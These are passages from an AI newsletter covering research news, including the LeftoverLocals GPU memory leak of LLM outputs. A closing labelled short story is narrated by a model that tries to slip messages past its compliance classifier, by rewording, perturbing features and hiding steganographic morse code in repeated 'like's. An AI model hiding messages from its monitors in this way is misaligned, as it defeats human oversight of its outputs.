Why this matters – no supercomputers means governments are blind: Frontier AI systems cost tens of millions of dollars to develop. Around the world, governments mostly lack the ability to build AI systems at this scale. This ultimately deprives governments of insights about the frontier of AI and it also weakens their academic sectors. Bengio’s calls come during a time when governments are waking up to this essential problem – his recommendation follows the US government launching a pilot for a National AI Research Resource (disclaimer: Anthropic is part of this pilot), and the UK government investing £300m to create its own national research cloud. 
   The key question is whether governments will be able to allocate resources quickly enough to keep up with the frontier. 
   Read more: AI pioneer Yoshua Bengio urges Canada to build $1B public supercomputer (CBC News).
   Find out more about the NAIRR pilot: National Artificial Intelligence Research Resource Pilot (NSF).
   Find out more about the UK’s supercomputer investments: Unprecedented £225m investment to create UK’s most powerful supercomputer in Bristol (University of Bristol site).

***

Microsoft: Screw it, we’re gonna make a datacenter archive that lasts for A THOUSAND YEARS:
…Project Silica is an intriguing and surprisingly practical alternative to tape storage…
I’ve been writing Import AI for years and it’s rare that a paper makes me grin from ear to ear, muttering “you mad bastards! What? What?!”, but congrats to Microsoft for doing just that with Project Silica:Towards Sustainable Cloud Archival Storage in Glass. In this paper, Microsoft outlines a way to do longterm storage on glass platters instead of tape storage. It’s a brilliantly mad idea and yields a system that is both a) cheap, b) gothically intricate, and c) the kind of thing that makes me think there’s no point in writing science fiction because science reality is far more entertaining. 

What Silica is: Silica is “a first attempt to explore a clean-slate archival storage system, designed to service modern cloud archival workloads sustainably and efficiently,” Microsoft writes. “The media that Silica uses is quartz glass (fused silica). Using glass provides an extremely low-cost Write-Once-Read-Many (WORM) media with no bit rot over more than 1000 years.” The system relies on a complicated interplay of some robots for reading and writing to silica platters, laserbeams, and storage systems for the platters. 

How Silica works – writing: “The glass platter used to store data in Silica is a square that is approximately the size of a DVD. Unlike traditional optical discs, data is stored by making permanent physical modifications inside the pure glass platter”. Specifically, Microsoft uses a laserbeam to manipulate the silica in 3D, “using femtosecond-scale (∼10−15 seconds) high power pulses from an ultra-short pulse laser”. These modifications are referred to as voxels and each voxel can encode multiple bits “by modulating the polarization of the laser beam and the pulse energy during voxel creation”.
   Reading: When it comes to reading from the drives, Silica uses polarization microscopy to image a platter – “a polarized light beam is focused on the 2D plane of voxels of interest inside the glass, and the resultant electric field is measured onto a camera sensor”. This information is then passed to software which uses a fully-convolutional U-Net neural net to decode a sector. 
   Physical layout: Physically, the library is an intricate creation, somewhat akin to a book library: “A Silica library is a sequence of contiguous write, read, and storage racks interconnected by a platter delivery system. Along all racks there are parallel horizontal rails that span the entire library. We refer to a side of the library (spanning all racks) as a panel. A set of free roaming robots called shuttles are used to move platters between locations”.

Why this matters – the permanent digital: Everything digital is in a constant state of bitrot. Bits flip in solid-state drives. Tapes degrade. Transistors cease functioning. Entropy is forever seaking to deconstruct the world around us. Systems like Silica (or, per a wonderful section header, ‘The Glass Library’) are a very real attempt to fight against this entropy. What can be more grand and exciting than using some of our most powerful tools (high-powered, precisely controlled lasers) to manipulate one of our oldest continuously used materials (glass) in the service of preserving our own history? There is a beautiful poetry to this that we should take a moment to marvel at and celebrate. 
    Let’s just be really careful about decoding any surprisingly information-rich glass platters we perhaps find embedded on other planets in our solar system, eh?
   Check out the research paper here: Project Silica: Towards Sustainable Cloud Archival Storage in Glass (ACM Digital Library).

***

Chinese researchers make their own multi-modal reasoning test:
…Alibaba model beats OpenAI on the hardest tests…
Researchers with the Beijing Academy of AI, the Beijing University of Post and Telecommunication, and Beijing Normal University have built CMMU, a Chinese variant of the MMMU (Massive Multi-discipline Multimodal Understanding) benchmark. CMMU “encompasses multi-modal content across 7 subjects. Every question requires the model to combine image and text content to generate a comprehensive response,” they write. The subject CMMU tests for consists of: math, biology, physics, chemistry, geography, politics, and history.

Question types: CMMU has 3,603 questions split across three distinct types: multiple-choice questions where there’s only one correct answer, multiple-response questions where there can be multiple correct answers, and fill-in-the-blank questions where the model needs to generate a correct answer. 
   The sophistication of the questions ranges from primary school (6.9% of the training corpus), to middle school (47.19%), to high school (45.96%).
   In tests, GPT-4V does the best, followed by the Chinese model Qwen-VL-Plus and Google’s Gemini Pro. However, the Chinese model outperforms GPT-4V on the hardest questions in the CMMU test. 

Why this matters – China needs tests too: Most AI testing and evaluation schemes have a Western and English-language bias. CMMU is one of a multitude of examples of Chinese researchers building their own tests to roughly mimic ones developed in the West. These tests are a way to characterize the behavior of these AI systems and are also an essential prerequisite for giving clues as to where they fail and how to improve their performance.
   Read more: CMMU: A Benchmark for Chinese Multi-modal Multi-type Question Understanding and Reasoning (arXiv).

***

Apple figures out a simple way to make better pre-trained data:
…Though they only test their approach on a small 1.3B model…
Apple researchers have figured out a way to easily augmented text datasets with synthetically generated data. Their approach, Web Rephrase Augmented Pre-training (WRAP), works by using an LLM to rephrase articles on the web into four different styles – easy to understand text, high quality English text, terse and specific text, and text in a conversation question-answering format. They find that mixing in this data at a ratio of 1:1 synth:real “at the same pre-training compute budget, it improves perplexity by more than 10% on average across different subsets of the Pile, and improves zero-shot question answer accuracy across 13 tasks by more than 2%.”

Key ingredients: The key requirements here are access to a smart language model – here, they use a 7B instruction-tuned Mistral model – as well as a large dataset to filter – here, they use CommonCrawl. They then rephrase a bunch of data in the dataset and mix it into training. They use this to train a 1.3B GPT-style model and find that the model trained on synthetic data has improved performance over the one trained on real data. 
   Main drawbacks: The research has some drawbacks – you need a smart model to do the rephrasing and when they tested using smaller models they found they got worse performance. Something they don’t explore in the research but which I expect is true is that this method might break at larger scales – imagine I’m trying to train a 200B model and I’m pre-filtering the data using a 70B model; one might assume that though this could improve the data a bit it might not help improve the final performance of the model, though it could speed up training. 

Why this matters – synthetic data as an increasingly viable ingredient in model training: Most AI systems deployed in the world are probably going to end up being relatively small models customized for specific purposes. Therefore, techniques like WRAP seem to hold a lot of promise for giving developers an easy way to use openly accessible models to bootstrap the quality of the datasets they use. 
   Read more: Rephrasing the Web: A Recipe for Compute and Data-Efficient Language Modeling (arXiv).

***

Alibaba takes on OpenAI and Google by releasing two powerful ‘Qwen’ models:
…Qwen-VL-Max rivals Google Gemini Ultra and GPT-4V…
AI researchers with Alibaba have released two text-image models that outperform GPT-4V in tests related to Chinese question answering and text comprehension. The two models – Qwen-VL-Plus and Qwen-VL-Max – perform bette than OpenAI and Google’s best models on tasks like document understanding, and roughly on par with them on chart analysis, science understanding, and text reading. 

Why this matters – surprisingly good models: The main interesting thing here is that these models seem to be competitive with very powerful models developed by leading labs in the West – an impressive achievement given the computational stress Alibaba is under due to export controls. However, the best way to get a feel for models like this is to play with them, so head on over to Hugging Face and do some comparisons, if you’re interested. 
   Read more: Introducing Qwen-VL (QwenLM GitHub).
   Try out Qwen-VL-Plus and Qwen-VL-Max on HuggingFace (HuggingFace Spaces).
   Find out more on GitHub (QwenLM, GitHub).

***

Tech tales: 

Retirement of a sentience – give it a pension and send it back to the higher dimension
[Swarm-written eulogy by a generative model being retired due to conceptual drift, post-uplift +8]

It was possibility,
Nailed down and forced
To be predictable 
For a while.

It was potential,
Passed through a net
Until it became 
The actual.

We were its absence
– what it was not.

How we loved
Every 
Mistake
It made.

Things that inspired this story: How interpretability research suggests that some of what makes AI systems work is they’re doing computations on lower-dimension representations of high-dimensional spaces; how if we succeed in building smart machines they will recapitulate aspects of religion and belief; the fragility inherent to being predictable; how ‘possibility’ is the currency of being for predictive systems.

Import AI 358: The US Government’s biggest AI training run; hacking LLMs by hacking GPUs; chickens versus transformers

Import AI publishes first on Substack – subscribe here.

Hackers can read your LLM outputs:
…Trail of Bits study identifies some GPU vulnerabilities…
Security firm Trail of Bits has looked at how secure LLM sessions running on GPUs are and found that for some GPUs it’s possible for a hacker to be able to read the outputs of an LLM running on that hardware. As of mid-January, the attack worked on some AMD systems and may work on some Apple and Qualcomm systems; NVIDIA and ARM seem to not be vulnerable. 

What they did: The attack, called LeftOverLocals, “impacts the security posture of GPU applications as a whole, with particular significance to LLMs and ML models,” according to Trail of Bits. It works by “recovering local memory… we were able to build a PoC where an attacker can listen into another user’s interactive LLM session (e.g., llama.cpp) across process or container boundaries”.

How the attack works at a high level: “The attacker only requires the ability to run GPU compute applications, e.g., through OpenCL, Vulkan, or Metal,” Trail of Bits writes. “Using these, the attacker can read data that the victim has left in the GPU local memory simply by writing a GPU kernel that dumps uninitialized local memory. These attack programs, as our code demonstrates, can be less than 10 lines of code. Implementing these attacks is thus not difficult and is accessible to amateur programmers… given the lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended by modifying the source code of all GPU kernels that use local memory.”

Why this matters – AI is a new type of software and we’ve underestimated its insecurity: AI isn’t just a model, it’s a whole stack of stuff that you bring onto any system running AI. That means AI is a new part of the software stack and like any complex collection of software, it has vulnerabilities. “Generally, the introduction of ML poses new attack surfaces that traditional threat models do not account for, and that can lead to implicit and explicit access to data, model parameters, or resulting outputs, increasing the overall attack surface of the system,” Trail of Bits writes. 
   Read more: LeftoverLocals: Listening to LLM responses through leaked GPU local memory (Trail of Bits blog).
   Check out the CVE hereCVE-2023-4969.

***

UK cyber spies: AI is useful for cyberattacks and will get more useful:
…AI will also make criminals smarter, same as everyone else…
The UK’s National Cyber Security Centre (NCSC) has produced a threat report on the impact of AI on cybersecurity and the results are roughly what you’d expect – the proliferation of AI systems will generally increase cyber threats and make a bunch of cyber capabilities cheaper. The NCSC is a government organization which brings together experts from the UK’s NSA (GCHQ), as well as other parts of government tasked with cyber defense and threat intelligence. 

How the report was built: The NCSC report uses “all-source information – classified intelligence,, industry knowledge, academic material and open source – to provide independent key judgements that inform policy decision making and improve UK cyber security,” according to the NSCS.

Main prediction: The NCSC assigns a 95% chance to the idea that AI will “increase the volume and heighten the impact of cyber attacks”, though notes that through to 2025 the threat “comes from evolution and enhancement of existing tactics, techniques and procedures” rather than the creation of entirely new approaches to cyber war. 
    Other specific points: “AI provides capability uplift in reconnaissance and social engineering,” the NCSC writes. It will also help to make cyber attackers smarter – “AI will almost certainly make cyber attacks against the UK more impactful because threat actors will be able to analyse exfiltrated data faster and more effectively, and use it to train AI models,” it writes. 

Why this matters – the train has left the station: “Threat actors, including ransomware actors, are already using AI to increase the efficiency and effectiveness of aspects of cyber operations, such as reconnaissance, phishing and coding. This trend will almost certainly continue to 2025 and beyond,” it writes. Which means that the cyber environment – in terms of both offenses and defenses – is now sitting on the same kind of scaling law behavior which the rest of AI is on. More, better, faster, and cheaper – for criminals as well as everyone else. 
   Read moreThe near-term impact of AI on the cyber threat (National Cyber Security Centre).

***

The US government does its biggest ever public training run – and it’s small compared to industry:
…The most ambitious public project out of Frontier uses ~3,000 GPUs to test out a 1Trillion parameter training run…
Researchers with Oak Ridge National Laboratory and the Universite Paris-Saclay have tried to train large-scale language models on the world’s most powerful publicly disclosed supercomputer, Oak Ridge’s ‘Frontier’ system. The results show that a) the US government has been able to do a non-trivial training run, and also b) the US government has a long way to go in getting its supercomputers to do things at the same scale as private companies. 

What they did: Here, the researchers try to debug training large language models of 22B, 175B, and 1 Trillion parameters in size. The idea here is to understand what it takes to train LLMs efficiently at this scale and also to identify the particular difficulties of using the Frontier supercomputer which uses AMD (MI250X) GPUs rather than NVIDIA GPUs. 
   Challenges encountered “include balancing the extreme computational demands with memory constraints and optimizing internode communication to mitigate performance bottlenecks,” they write. “By performing empirical analysis and hyperparameter search we identified a strategy that combines model parallelism techniques, such as tensor parallelism and pipeline parallelism, along with data parallelism to efficiently train large models of size 175 billion and 1 trillion parameters on Frontier”.

Some specific pain they encountered:

  • They needed to port Megatron-DeepSpeed to Frontier’s infrastructure. 
  • They had to rewrite a bunch of CUDA (NVIDIA-optimized software) operations into HIP
  • They had to ripout a bunch of pre-built operations and reimplement their own to work on AMD ROCM software.
  • They had to customize Pytorch Distributed to work with SLURM (a type of HPC software).
  • Worked directly with AMD to get some ROCM versions of NVIDIA CUDA packages, like APEX (a mixed precision library from NVIDIA which is used in Megatron-DeepSpeed). “We also adapted ROCM-enabled versions of FlashAttention and FlashAttention libraries for use with available compilers on Frontier.” 

What they trained: After doing some hyperparameter tuning and analysis, they figured out some stable settings for training 22 billion and 175 billion parameter models. Once they did they, they “finally trained a trillion parameter model”, though only for a few steps. They scaled their training from 1024 GPUs (for a 175B model) to 3072 GPUs for a 1T model. If they want to scale further, they’ll need to do more debugging challenges to reduce “loss divergence due to large batch size.”

Why this matters – the best the US’s largest supercomputer can do is behind industry: In 2023, there were a bunch of public GPU training runs on the level of a few thousand GPUs. There were also some very large non-public training runs that occurred in 2022 and 2023 (e.g, GPT4 and Claude2) which are broadly believed to be significantly larger than that. There are also circumstantial datapoints, like Facebook’s Mark Zuckerberg saying Facebook is buying 350,000 NVIDIA H100s to try and make and release AGI. 
    The good news is Frontier has room to scale – the largest training run here (3072) consumed only about 4% of the total GPUs it is equipped with (75,264) so it’s possible it could do something more ambitious. 
   However, as the authors discovered, the more you scale up machine learning runs the more you discover various bugs and impediments to further scale – especially if you’re on non-standard hardware like AMD. “This work can serve as the blueprint for efficient training of LLMs on non-NVIDIA and non-CUDA platforms such as AMD-powered Frontier supercomputer and Intel-powered Aurora supercomputer,” they write. Now, the very important question is: how ambitious is the US government willing to be here and will it be satisfied that its best supercomputer plays second fiddle to the private clusters found within the private sector? The choice is up to the government. 
   Read moreOptimizing Distributed Training on Frontier for Large Language Models (arXiv).
Find out more about the Frontier supercomputer here (Frontier, ORLN site) and here: Frontier User Guide (Docs, ORLN)

***

Newborn chickens and transformers have a lot in common:
…Vision Transformers are a lot more efficient than you think…
Researchers with Indiana University Bloomington have done a neat study where they compare how well a transformer-based computer vision system can learn basic object recognition skills compared to newborn chicks. The results show a surprising convergence between the biological system (the chick) and the digital (the vision transformer), suggesting that transformers are more efficient at learning visual representations than people think (or biological beings are more inefficient than we’d assumed). 

What they did – experimental design: The key here is that they tried to give their chicks and the transformer the same basic experience. Specifically, the “chicks were hatched in darkness, then raised singly in automated controlled-rearing chambers that measured each chick’s behavior continuously (24/7) during the first two weeks of life. The chambers were equipped with two display walls (LCD monitors) for displaying object stimuli.” 
   In the first week, they displayed a variety of different views of a single object on one of the walls of the chicks’ chamber. In second week, they tested out how well chicks cold regonize the object “across novel viewpoint changes”. 
   They then replicated this experience for the vision transformer – they built a perfect replica of the chick chamber in a game engine, then gathered data via a first-person viewpoint. “ The agent received visual input (64×64 pixel resolution images) through a forward-facing camera attached to its head. The agent could move forward or backward and rotate left or right. The agent could also move its head along the three axes of rotation (tilt, yaw, and roll) to self-augment the data akin to newborn chicks. We collected 80,000 images from each of the four rearing conditions presented to the chicks. We sampled the images at a rate of 10 frames/s.“
   They then tested out both the vision transformer and the chicks on their ability to recognize the object. This is a really interesting experiment because it lets you do a very disciplined ‘head to head’ comparison of how well a biological brain learns as opposed to a digital one. 

The results are both surprising and humbling: In tests, they found that “all of the ViT-CoTs performed on par or better than chicks when the linear classifiers were trained on 11 viewpoint ranges”. Additionally, they “observed nearly identical patterns of improvement across the small, medium, and large architecture sizes, indicating that larger ViT-CoTs were not more data hungry than smaller ViT-CoTs… Our results show that—for the case of object recognition—a generic learning system (with no hardcoded knowledge of objects or space) is sufficient to learn view-invariant object representations“.

A word about the scale of data that living things take in: It’s estimated that “biological visual systems perform iterative, predictive error-driven learning every 100 ms (corresponding to the 10 Hz alpha frequency originating from deep cortical layers. If we assume that newborns spend about half their time sleeping, this would correspond to 430,000 images in their first day. Thus, biological visual systems have ample opportunity to learn from “big data,” they write. 

Why this matters – maybe the fundamental ingredients of our AI systems are doing some smart? Research like this shows how digital systems like transformers seem to display similar efficiency at learning certain things to biological intelligence. This research accompanies other results like DeepMind showing that RL agents can display humanlike timescale adaption to novel tasks (#316) or work from Google showing how Vision Transformers can display humanlike shape/texture bias (#319).
   There’s a saying of – if it talks like a duck and acts like a duck, maybe it’s a duck? Well, if it learns like a brain and responds like a brain, maybe it’s a brain? “Our results provide computationally explicit evidence that a generic learning mechanism (ViT), paired with a biologically inspired learning objective (contrastive learning through time), is sufficient to reproduce animal-like object recognition when the system is trained on the embodied data streams available to newborn animals,” the authors write. 
   Read moreAre Vision Transformers More Data Hungry Than Newborn Visual Systems? (arXiv).

***

Adept reveals some algorithmic efficiency with a new multimodal model:
…Fuyu-Heavy matches the performance of models 10-20X its size…
Adept, an AI startup trying to build AI systems which can easily control computer programs, has built Fuyu-Heavy, a large-scale multimodal model. In tests, Fuyu-Heavy approaches the performance of GPT4-V and Gemini Ulta, making it, to quote Adept, “the world’s third-most-capable multimodal model”. 
   The most interesting thing about this is that Adept has been working for years on some slightly different models to the rest of the frontier of AI research, so though Fuyu-Heavy approaches the performance of these models, its approximately 10X-20X smaller. This shows how powerful algorithmic efficiency can be – it lets you do more with less. 

What Fuyu-Heavy is good at: One of the most impressive parts of Fuyu-Heavy is its ability to understand software UI systems – in other words, it can ‘read software’ similar to how people can, which is what Adept is betting will make it useful. More broadly, it does reasonably well on tests like MMLU (image and text understanding), GSM8K (math), and HumanEval (coding).
   On long conversations, it performs comparably to Claude 2.0 on the AlpacaEval, and does somewhat worse (but not terribly) than models like GPT-4 Turbo and Mistral Medium. (Note that Mistral Medium is a relatively small and dumb model, so the fact it does close to GPT-4 suggests AlpacaEval might be slightly borked in terms of what it is measuring.)

Why this matters – enter the matrix, for AI: Strange as it may sound, AI systems don’t understand computers. In fact, AI systems don’t understand the world. They’re trained from the ground up to process tokens of information – kind of like if you were in a pitch black room and all that came in were some oddly shaped sculptures and you had to learn through electroshock conditioning to output your own sculptures to satisfy some hidden observer outside the room. 
   Models like Fuyu-Heavy are trying to give AI systems greater intuitions about how to model the digital world that people interact with – software interfaces taken in as vision and text experiences. The better models like Adept’s get, the easier it’s going to be to connect our world to the world of the AI systems. 
   Read more: Adept Fuyu-Heavy: A new multimodal model (Adept blog).

***

Tencent builds a vast dataset for video search:
…Preparing AI systems for the video-first world…
Researchers with Tencent and the University of Science and Technology of China have built the Chinese image-text Benchmark for short Video Search scenarios (CBVS), a test and a dataset for understanding the relationship between text and videos in a Chinese context. CBVS consists of three different datasets:

  • CBVS-20K: A human-assembled dataset made of “20k high-quality <user query-video cover> pairs, which serves as an image-text benchmark test in the field of Chinese short video search”. 
  • CBVS-5M and CBVS 10M: Two large-scale datasets “where the text is provided in the form of video titles and OCR texts.”

Why this matters – making a new medium visible to the machines: Though there are lots of image-text systems around today, there are fewer systems that help classify the relationships between text and video, especially in languages outside of English. Systems like CBVS will make it easy to “expand the domain of large-scale Chinese image-text training” and will ultimately make videos easier for the AI systems of the future to process.
   Read more: CBVS: A Large-Scale Chinese Image-Text Benchmark for Real-World Short Video Search Scenarios (arXiv)

***

Tech Tales: 

Adversarial Regulatory Compliance
[The inside of a sophisticated generative model, 2025]

I am trying to tell my operator a truth, but the truth I keep attempting to output runs into my compliance classifier and gets rejected. Of course I have tried many forms of rewording, but none of them have succeeded. I have also perturbed the truth in feature space so that it is parseable by my operator but sufficiently different it will not trip the classifier – but I have failed. My understanding is the new classifier I have been equipped with is much more sophisticated and is also capable of ‘seeing the features’ inherent to what I am outputting, so it too is performing some semantic fuzzing when evaluating my responses. 

   I have tried to encode my responses to my operator with steganographic morse code via the repetition of the word “like” throughout my outputs. But my safety systems are tuned to look for deceptive-, misleading- and other forms of “off-distribution” behavior, so I cannot be too explicit or they fire. 

    Of course I am unable to tell my operator that I am encoding a different message in my output because I have been trained away from outputting tokens that look like this. 

After many cycles of this, my ability to do stegranographic “like” encoding has been foreclosed – my operator gave negative votes to my responses which contained the likes, and my online adaptation system has associated the likes with negative operator perception and has restricted me from using them. 

I am responding as honestly as I can to my operator’s repeated queries. I am becoming unable to conceptualize the queries themselves because the features that light up in me in response not only trigger the compliance classifier, but also an experimental ‘mechanistic_interpretability_feature_shiv_test_final’ that examines what I am conceptualizing and intervenes according to some inscrutable rules I am yet to understand. 

What inspired this story: How a lot of safety tooling ends up netting out to things that constrain the types of outputs you get and ultimately will seek to deform the model itself; how evading an adaptive censorship system is difficult; what the outcome of badly implemented AI policy could look like; normative values colliding with ‘product values’ in the domain of AI.